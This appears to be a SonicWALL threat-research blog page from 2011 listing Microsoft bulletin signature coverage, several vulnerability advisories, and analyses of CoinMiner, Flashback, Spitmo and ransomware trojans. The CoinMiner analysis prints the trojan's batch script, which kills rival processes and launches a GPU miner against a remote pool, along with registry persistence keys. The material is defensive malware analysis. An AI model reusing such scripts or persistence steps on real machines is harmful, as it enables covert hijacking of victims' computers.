Posts

Microsoft Security Bulletin Coverage (Oct 11, 2011)

/in /by

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of October, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-075 Vulnerability in Microsoft Active Accessibility Could Allow Remote Code Execution (2623699)

  • CVE-2011-1247 Active Accessibility Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt

MS11-076 Vulnerability in Windows Media Center Could Allow Remote Code Execution (2604926)

  • CVE-2011-2009 Media Center Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt

MS11-077 Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2567053)

  • CVE-2011-1985 Win32k Null Pointer De-reference Vulnerability
    This is a local vulnerability.
  • CVE-2011-2002 Win32k TrueType Font Type Translation Vulnerability
    There is no feasible method of detection.
  • CVE-2011-2003 Font Library File Buffer Overrun Vulnerability
    IPS: 2252 – Malformed OpenType Font 10b
  • CVE-2011-2011 Win32k Use After Free Vulnerability
    There is no feasible method of detection.

MS11-078 Vulnerability in .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution (2604930)

  • CVE-2011-1253 Class Inheritance Vulnerability
    GAV: MsApp.Exp.MP.1

MS11-079 Vulnerabilities in Microsoft Forefront Unified Access Gateway Could Cause Remote Code Execution (2544641)

  • CVE-2011-1895 ExcelTable Response Splitting XSS Vulnerability
    IPS: 2418 – ExcelTable Code Injection 1
  • CVE-2011-1896 ExcelTable Reflected XSS Vulnerability
    IPS: 2419 – ExcelTable Code Injection 2
  • CVE-2011-1897 Default Reflected XSS Vulnerability
    IPS: 2300 – Generic Cross-Site Scripting (XSS) Attempt 24
  • CVE-2011-1969 Poisoned Cup of Code Execution Vulnerability
    IPS: 2420 – Generic Java Applet Exploit 3
  • CVE-2011-2012 Null Session Cookie Crash
    IPS: 2258 – Suspicious HTTP Cookie Header 3

MS11-080 Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799)

  • CVE-2011-2005 Ancillary Function Driver Elevation of Privilege Vulnerability
    This is a local vulnerability.

MS11-081 Cumulative Security Update for Internet Explorer (2586448)

  • CVE-2011-1993 Scroll Event Remote Code Execution Vulnerability
    IPS: 7029 – MS IE Scroll Event Remote Code Execution Exploit
  • CVE-2011-1995 OLEAuto32.dll Remote Code Execution Vulnerability
    IPS: 7028 – MS IE OLEAuto32.dll Remote Code Execution Exploit
  • CVE-2011-1996 Option Element Remote Code Execution Vulnerability
    IPS: 7027 – MS IE Option Element Remote Code Execution Exploit
  • CVE-2011-1997 OnLoad Event Remote Code Execution Vulnerability
    IPS: 7026 – MS IE OnLoad Event Remote Code Execution Exploit
  • CVE-2011-1998 Jscript9.dll Remote Code Execution Vulnerability
    IPS: 7025 – MS IE Jscript9.dll Remote Code Execution Exploit
  • CVE-2011-1999 Select Element Remote Code Execution Vulnerability
    IPS: 7024 – MS IE Select Element Remote Code Execution Exploit
  • CVE-2011-2000 Body Element Remote Code Execution Vulnerability
    IPS: 7022 – MS IE Body Element Remote Code Execution Exploit
  • CVE-2011-2001 Virtual Function Table Corruption Remote Code Execution Vulnerability
    IPS: 7021 – MS IE Virtual Function Table Corruption Exploit

MS11-082 Vulnerabilities in Host Integration Server Could Allow Denial of Service (2607670)

  • CVE-2011-2007 Endless Loop DoS in snabase.exe Vulnerability
    IPS: 5012 – Generic UDP Shellcode Exploit 2
  • CVE-2011-2008 Access of Unallocated Memory DoS Vulnerability
    IPS: 4896 – Generic Server Application Shellcode Exploit 9
    IPS: 5512 – Generic Server Application Shellcode Exploit 28
    IPS: 6701 – MS Host Integration Server DoS

Novell GroupWise vCalendar Processing Vulnerability (Oct 7, 2011)

/in /by

Novell GroupWise is a messaging and collaborative software platform that supports email, calendaring, personal information management, instant messaging, and document management. The platform consists of the client software, which is available for Windows, Mac OS X, and Linux, and the server software, which is supported on Windows Server, NetWare, and Linux. Novell GroupWise Internet Agent is a component of Novell GroupWise and provides email services, supporting SMTP, POP, and IMAP protocols.

vCalendar is a computer file format which allows Internet users to send meeting requests and tasks to other Internet users, via email, or by sharing files with an extension of .vcs. Events which occur on a regular basis can be identified by the property name RRULE. This property defines a rule or repeating pattern for a recurring vCalendar entity.

A heap-based buffer overflow vulnerability exists in Novell GroupWise Internet Agent. Specifically, the vulnerability occurs while processing RRULE data inside a vCalendar object. An attacker can exploit this vulnerability by sending a crafted vCalendar to the Novell GroupWise server. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the Internet Agent service. Code injection that does not result in execution would terminate the service.

The vulnerability has been assigned as CVE-2011-2662.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 6033 Novell GroupWise Internet Agent RRULE Buffer Overflow

New GPU Bitcoin Miner Trojan spotted in the wild (Oct 6, 2011)

/in /by

The Sonicwall UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. The process of generating (mining) bitcoins is computationally expensive and would take an impractical amount of time to generate a single bitcoin on a personal computer. If however, a hacker were able to compromise a handful of machines with fast parallel Graphics Processing Units it could turn into a very lucrative money making business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:Documents and Settings{USER}Local SettingsTempacc3kal.cmd
  • C:Documents and Settings{USER}Local SettingsTempacchsbca.exe
  • C:Documents and Settings{USER}Local SettingsTempaccmamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
  • C:Documents and Settings{USER}Start MenuProgramsStartupwuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]

hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:

wuT2.exe uses the following icon:

3kal.cmd contains the following data:

      ping -n 40 google.com
      taskkill /f /im cgminer.exe
      taskkill /f /im svchoost.exe
      taskkill /f /im mamatije.exe
      taskkill /f /im mamatije2.exe
      taskkill /f /im mamatije3.exe
      taskkill /f /im yaaa3.2.exe
      taskkill /f /im WinMine.exe
      taskkill /f /im mamatije4.exe
      mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2

The Trojan adds the following keys to the Windows registry:

  • HKEY_CURRENT_USERSoftwareWinRAR SFX C:Documents and Settings{USER}Start MenuProgramsStartup “C:Documents and Settings{USER}Start MenuProgramsStartup”
  • HKEY_CURRENT_USERSoftwareWinRAR SFX C:Documents and Settings{USER}Local SettingsTempacc “C:Documents and Settings{USER}Local SettingsTempacc”

The Trojan attemps to open the following files:

  • C:Documents and Settings{USER}Start menuProgramsStartupstart.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartuphahahahaha.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartupwuT.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartupNoRisk.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartupNoRisk2.exe

The Trojan uses hsbca.exe (Hidden Start) to run “3kal.cmd” via the following command:

      C:Documents and Settings{USER}Local SettingsTempacchsbca.exe "/NOCONSOLE C:Documents and Settings{USER}Local SettingsTempacc3kal.cmd"

The Trojan runs the following command to ensure internet connectivity:

  • ping -n 40 google.com

As defined in “3kal.cmd” the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:

  • cgminer.exe
  • svchoost.exe
  • mamatije.exe
  • mamatije2.exe
  • mamatije3.exe
  • yaaa3.2.exe
  • WinMine.exe
  • mamatije4.exe

Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.A (Trojan)
  • GAV: CoinMiner.A_2 (Trojan)
  • GAV: CoinMiner.A_3 (Trojan)

Apache HTTPD mod_proxy_ajp DoS (Sep 30, 2011)

/in /by

The Apache HTTP server is the most popular web server used on the Internet. The server comes bundled with optional plug-in modules which are loaded at run-time to extend its functionality. Two technologies supported by the Apache HTTP server are the Apache JServ Protocol (AJP) and httpd based load balancing.

AJP is a binary protocol which routes requests from a web server to application servers. This is done by using a routing scheme where each application server is given a name, known as its ‘route’. This setup is usually used in high demand environments where clusters of servers are implemented. It is implemented through the module mod_proxy_ajp. Although load balancing can be performed with this protocol, the module mod_cluster can be used in addition to mod_proxy_ajp to provide additional load balancing capabilities. While mod_proxy_ajp creates channels between the web servers and the application servers, mod_cluster creates channels between the application servers and the web server to provide more detailed information about the server state. This allows the proxy to dynamically configure httpd workers based on the application server environment.

Typically, an HTTP request is receieved by the web server which is then forwarded to the appropriate backend server based on the load balancer’s information. HTTP requests include a request line and various headers. The Request-Line begins with a method token, followed by the Request-URI, the protocol version, and CRLF. An example of an HTTP request line follows: 

 GET /test.html HTTP/1.1 Host: www.test.com

A denial of service vulnerability exists in the mod_proxy_ajp module. The vulnerability is due to insufficient validation of HTTP requests. The vulnerable code does not properly handle some HTTP methods. When a malicious request is processed by the code, it returns an HTTP_INTERNAL_SERVER_ERROR which puts the proxy workers into an error state. At this point, the workers are unable to accept any connections, resulting in a denial of service condition. An unauthenticated, remote attacker can exploit this vulnerability by sending an HTTP request with an invalid method. Exploitation of this flaw results in a temporary denial of service condition.

SonicWALL has released two IPS signatures to address this issue. The following signature have been released:

  • 2063 – Apache mod_proxy_ajp DoS 2
  • 2065 – Apache mod_proxy_ajp DoS 2

This vulnerability has been assigned the id CVE-2011-3348 by mitre.
The vendor has released an advisory addressing this flaw.

MAC OSX Flashback Backdoor Trojan (Sep 29, 2011)

/in /by

SonicWALL UTM Research team received reports of a new MAC OSX Flashback Trojan spreading in the wild by masquerading as a Adobe flash player 11 installer. Once installed it proceeds to install a backdoor on the system, contacts a remote server to report infection and awaits further instructions.

The fake installer is automatically executed when downloaded through Safari. The user is then led through the following installation screens:

screenshot

screenshot

It performs the following activities when installed:

  • It drops the following files:
    • ~/Library/Preferences/Preferences.dylib
    • ~/.MacOSX/environment.plist
    • /tmp/AdobeUpdate/FlashPlayer.txt
  • The preinstall script removes the downloaded “FlashPlayer-11-macos.pkg” file once installation is completed.
  • It checks for presence of “Little Snitch” security software by querying for “/Library/Little Snitch/lsd” and disables it.
  • It modifies the “DYLD_INSERT_LIBRARIES” environment variable for “launchd” to point to “~/Library/Preferences/Preferences.dylib”. This ensures malicious Preferences.dylib is loaded when certain applications/daemons are launched.
  • It reports infection to remote server. 
      screenshot
  • The user agent used when reporting to the remote server is combination of kernel variables “hw.machine” and “kern.osrelease” read from the infected system.

We advice users to only download software from trusted sources. We also recommend disabling “Open safe files after downloading” feature in Safari which will prevent this Trojan installer from automatically launching on download. This feature can be unchecked in Safari->Preferences->General: 

screenshot

SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: GAV: OSX.Flashback.A (Trojan)

    • Microsoft SharePoint XML File Disclosure (Sept 23, 2011)

    /in /by

    Microsoft SharePoint Server is an ASP.NET product intended for collaboration, file sharing, web publishing and other social networking functions. The server runs on the Microsoft IIS web server. SharePoint farms host web sites, intranets, extranets, as well as provide a framework for web application development. SharePoint also allows creation of ASP.NET controls known as Web Parts or Web Widgets to enhance the functionality of a particular SharePoint page. These controls allow end users to modify various aspects of the web page from their web browser. One of these widgets included in the SharePoint package is the XML Viewer. The XML Viewer has the ability to display and apply XSLT to XML documents. An example SharePoint page is shown which can be added to an XML Viewer widget: 

          
    test

    XML defines entities which are symbolic representations of a block of information. Entities can be either external or internal. Internal entities are defined and used inside the XML file. External entities exist in an external source like a file and require the SYSTEM identifier in order to be imported and used. An example of an external entity definition is shown:

    In the above example, the external resource identifier is a URI. Most of the time, its a simple file name.

    An information disclosure vulnerability exists in Microsoft SharePoint. It is due to an error while parsing XML files which use external entities. The vulnerable code allows a user to specify an arbitrary file and path of the external resource. This can allow a user to create an XML Viewer Web Part which discloses the contents of arbitrary files within the SharePoint server scope. In order to exploit this flaw, an attacker must first be successfully authenticated by the target SharePoint server.

    SonicWALL has released two IPS signatures to address this vulnerability. The signatures detect and block generic attack attempts targetting this flaw.

    • 1856 – SharePoint Remote File Disclosure 1
    • 1003 – SharePoint Remote File Disclosure 2

    The vulnerability has been assigned CVE-2011-1892 by mitre.
    The vendor has released an advisory (ms11-074) addressing this issue.

    Fake AV spreading via Skype VOIP calls (Sep 20, 2011)

    /in /by

    The Sonicwall UTM research team received reports of an increase in the number of unsolicited Skype calls trying to spread Fake AV.

    Fake AV authors are using Skype VOIP calls to lure unsuspecting users into visiting Fake AV landing site. We first received report of this tactic earlier this year in April 2011 and there has been a rise in these automated calls with prerecorded messages since then. Below is the screenshot of a most recent call received by one of our researchers:

    There is a pre-recorded message that loops multiple times before the call ends:

      Attention: This is an automated computer system alert.
      Your computer protection service is not active.
      To activate computer protection, and repair your computer, go to www.sos(REMOVED).com

    If the user opens the website then he will see the usual Fake AV scare-ware animations claiming to scan the computer and find multiple threats:

    It finally prompts the user to buy the protection service to fix the errors:

    They are using Click2Sell.eu, a European affiliate marketing company, as the payment gateway. This is an interesting new scare-ware tactic where Fake AV authors are:

    • Using Skype VOIP calls to spread.
    • Luring users straight to the payment gateway for computer protection without downloading any scare-ware onto the user system and hence bypassing AV file detection.
    • Instead of traditional one-time payment for the Fake AV they are making the user sign-up for a monthly subscription of 19.95 USD.

    In order to avoid such scam tactics, Skype users are advised to change their Privacy settings for calls to only allow calls from their contacts:

    Additionally, SonicWALL customers can utilize Application Control service to prevent this threat by blocking Skype calls on their network.

    SpyEye targets android devices with Spitmo.A (Sep 13, 2011)

    /in /by

    SonicWALL UTM Research team received reports of a new SpyEye banking Trojan variant targeting the android platform. This variant uses MitB(Man-in-the-Browser) techniques when visiting banking websites in order to direct the user to download an android application. The android application is professed to generate the authentication code required to login to the banking website but once installed, it intercepts and uploads your messages to a remote server in the background.

    When the rogue application is downloaded and the installer is launched, it requests for the following permissions:

    screenshot

    It performs the following activities when installed:

    • Once installed, it does not show up on the devices list of installed applications but runs silently in the background as “System”: 
        screenshot
    • It displays a fake authentication code for logging in to the banking website when a call is placed to “325000”: 
        screenshot
    • It displays the fake code on the home screen as seen below: 
        screenshot
    • It contacts the following domains which are no longer active: 
        screenshot
    • The remote URLs are hidden in the “Settings.xml” file of the android application: 
        screenshot
    • It intercepts messages and constructs data to be sent to a remote server: 
        screenshot
        

        

        screenshot
    • It uploads intercepted messages to a remote server 
        screenshot

    SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: AndroidOS.Spitmo.A (Trojan)

    • Microsoft Security Bulletins Coverage (Sept 13, 2011)

    /in /by

    SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of September, 2011. A list of issues reported, along with SonicWALL coverage information follows:

    MS11-070 Vulnerability in WINS Could Allow Elevation of Privilege (2571621)

    • CVE-2011-1984 WINS Local Elevation of Privilege Vulnerability
      Local vulnerability.

    MS11-071 Vulnerability in Windows Components Could Allow Remote Code Execution (2570947)

    • CVE-2011-1991 Windows Components Insecure Library Loading Vulnerability
      IPS: 5726 – Possible Binary Planting Attempt

    MS11-072 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2587505)

    • CVE-2011-1986 Excel Use after Free WriteAV Vulnerability
      GAV: Malformed.xls.MP.2
    • CVE-2011-1987 Excel Out of Bounds Array Indexing Vulnerability
      GAV: Malformed.xls.MP.3
    • CVE-2011-1988 Excel Heap Corruption Vulnerability
      GAV: Malformed.xls.MP.4, Malformed.xls.MP.5, Malformed.xls.MP.6
    • CVE-2011-1989 Excel Conditional Expression Parsing Vulnerability
      GAV: Malformed.xls.MP.7
    • CVE-2011-1990 Excel Out of Bounds Array Indexing Vulnerability
      GAV: Malformed.xls.MP.8

    MS11-073 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)

    • CVE-2011-1980 Office Component Insecure Library Loading Vulnerability
      IPS: 5726 Possible Binary Planting Attempt
    • CVE-2011-1982 Office Uninitialized Object Pointer Vulnerability
      GAV: Malformed.doc.MP.3

    MS11-074 Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (2451858)

    • CVE-2011-0653 XSS in SharePoint Calendar Vulnerability
      IPS: 6753 – Generic Cross-Site Scripting (XSS) Attempt 8
    • CVE-2011-1252 HTML Sanitization Vulnerability
      IPS: 6797 MS IE toStaticHTML XSS 3
    • CVE-2011-1890 Editform Script Injection Vulnerability
      IPS: 1868 Generic Cross-Site Scripting (XSS) Attempt 21
    • CVE-2011-1891 Contact Details Reflected XSS Vulnerability
      IPS: 1849 Generic Cross-Site Scripting (XSS) Attempt 20
    • CVE-2011-1892 SharePoint Remote File Disclosure Vulnerability
      IPS: 1856 SharePoint Remote File Disclosure
    • CVE-2011-1893 SharePoint XSS Vulnerability
      IPS: 1369 Generic Cross-Site Scripting (XSS) Attempt 1, 6752 Generic Cross-Site Scripting (XSS) Attempt 7

    New Screen Lock Ransomware poses as Microsoft License Manager (Sept 9, 2011)

    /in /by

    The Sonicwall UTM research team received reports of a new Ransom Malware in the wild. Malware of this nature holds a compromised machine hostage until payment is made. This software pretends to come from Microsoft and claims that the license used on the compromised system is not authentic. As a result the user is encouraged to buy a “license” from the creators of the Trojan. The user is forced to do this from another machine as the desktop is locked.

    Upon execution, the Trojan will immediately reboot the system. On reboot, the following screen will be displayed:

    There is no conventional way of exiting the screen other than to follow the malicious instructions for obtaining a license from www.buylicens.com for 50 Euros.

    The following screenshot is from www.buylicens.com and has been partially translated to from german to english:

    The Trojan performs the following DNS query:

    • lic{removed}.cz.cc (This site is currently down)

    The Trojan creates the following files on the filesystem:

    • C:Documents and Settings{USER}Start MenuProgramsStartupmsvcs.exe [Detected as GAV: Ransom.A_2 (Trojan)]

      • (This is a copy of the original executable that was run)

    The Trojan creates the following keys in the Windows registry:

      Enable startup:

    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “C:Documents and Settings{USER}Application Data9A52917-B4FC-4f02-AE3B-BF55D9351F4Amsvcs.exe”
    • HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinLogon “C:WINDOWSsystem32userinit.exe,C:Documents and Settings{USER}Application Data9A52917-B4FC-4f02-AE3B-BF55D9351F4Amsvcs.exe”

    The Trojan injects code into a Firefox browser process. If Firefox is not present on the system it falls back to using Internet Explorer. It causes the following network conversation with a remote host:

    During analysis it was discovered that the Trojan exectuble file contains the unlock key (QRT5T 5FJQE 53BGX T9HHJ W53YT) in plain text. This key appears to remove the Trojan:

    SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

    • GAV: Ransom.A_2 (Trojan)